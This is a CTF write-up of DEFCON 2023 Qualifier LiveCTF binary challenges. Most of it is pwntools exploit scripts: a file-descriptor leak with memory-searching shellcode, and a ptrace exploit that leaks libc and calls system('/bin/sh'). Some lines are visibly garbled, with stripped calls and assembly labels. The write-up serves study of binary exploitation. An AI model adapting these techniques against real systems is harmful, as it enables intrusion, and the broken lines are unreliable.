DEFCON 2023 Qualifier: LiveCTF


LiveCTF is a sub category of DEFCON competition which mostly comprosises with binary challenges with easier difficulty- but with less time and points. The key to utilize LiveCTF in DEFCON is to solve it as fast as possible while using the least manpower as possible.

An interesting thing about LiveCTF challenges is its own unique way of submitting its solutions. Instead of directly pasting the flag, we submit a compressed solution file containing a Dockerfile and the exploit.

At the DEFCON 2023 Qualification Round, there were a total of 7 LiveCTF challenges.

I focused on LiveCTFs in this qualification round and will go over some pwn (binary) challenges that I worked on/solved.

LiveCTF Practice Challenge

The solution is given, as it is just to make sure the submition system works:

from pwn import *
HOST = os.environ.get('HOST', 'localhost')
PORT = 31337

r = remote(HOST, int(PORT))
r.recvline_contains(b'Give me input: ')
r.recvline_contains(b'You sent: ')
flag = r.recvline_contains(b'LiveCTF{').decode().strip()'Flag: %s', flag)


In the challenge source code,

if ( read(f, code, 0x100uLL) == -1 )
    puts("read failed");

Fail in reading a file doesn’t close the file descriptor, therefore, can be leaked.


A solution by my teammate from P1G BuT S4D:

#!/usr/bin/env python3

from pwn import *
import re

context.arch = "amd64"
context.log_level = "DEBUG"
context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

HOST = os.environ.get('HOST', 'localhost')
PORT = 31337

# r = remote(HOST, int(PORT))
r = process("../handout/challenge")

r.sendlineafter(b"Choice:", b"1")
r.sendlineafter(b">", b"/flag")

r.sendlineafter(b"Choice:", b"1")
r.sendlineafter(b">", b"/flag")

r.sendlineafter(b"Choice:", b"1")
r.sendlineafter(b">", b"/proc/self/fd/0")

    call A
    pop rdx
    mov rax, 8882879963476683084
    cmp QWORD PTR [rdx], rax
    je FOUND
    dec rdx
    jmp ZALOOP
    mov rdi, QWORD PTR [rdx]
    mov rsi, rbp
    sub rsi, 0x28
    mov rsi, QWORD PTR [rsi]
    add rsi, 0x0c
    mov rdi, QWORD PTR [rdx]
    mov QWORD PTR [rsi], rdi
    mov rdi, QWORD PTR [rdx+8]
    mov QWORD PTR [rsi+8], rdi
    mov rdi, QWORD PTR [rdx+16]
    mov QWORD PTR [rsi+16], rdi
    mov rdi, QWORD PTR [rdx+24]
    mov QWORD PTR [rsi+24], rdi


r.sendlineafter(b"Choice:", b"2")
print(re.findall(rb'LiveCTF{[^}{}]+}', r.recvall(timeout=3))[0].decode())


The challenge spawns a child process and lets the user run any kind of ptrace requests as much as the user wants.

We can exploit the challenge by:


#!/usr/bin/env python3

from pwn import *

context.arch = "amd64"
context.log_level = "DEBUG"
context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']

HOST = os.environ.get('HOST', 'localhost')
PORT = 31337

system_offset = 331104
binsh_offset = 1935000

r = remote(HOST, int(PORT))
# r = process("./challenge")

r.sendlineafter(b"send?", b"0x3")
r.sendlineafter(b"want?", b"0x80")
r.sendlineafter(b"data?", b"0x0")

r.recvuntil(b"returned ")
leak = int(r.recvline().strip()[2:].decode(), 16)

r.sendlineafter(b"(0/1)?", "1")

libc_base = leak - 0x7ffff7e7abc7 + 0x7ffff7d91000 - 0x1000

r.sendlineafter(b"send?", b"0x6")
r.sendlineafter(b"want?", b"0x80")
r.sendlineafter(b"data?", hex(libc_base + system_offset).encode())
r.sendlineafter(b"(0/1)?", b"1")

r.sendlineafter(b"send?", b"0x6")
r.sendlineafter(b"want?", b"0x70")
r.sendlineafter(b"data?", hex(libc_base + binsh_offset).encode())
r.sendlineafter(b"(0/1)?", b"1")

# gdb.attach(r)

r.sendlineafter(b"send?", b"0x7")
r.sendlineafter(b"want?", b"0x0")
r.sendlineafter(b"data?", b"0x0")

# print(hex(libc_base))

# pause()
r.sendlineafter(b"(0/1)?", b"0")



flag = r.recvline_contains(b'LiveCTF{').decode().strip()'Flag: %s', flag)
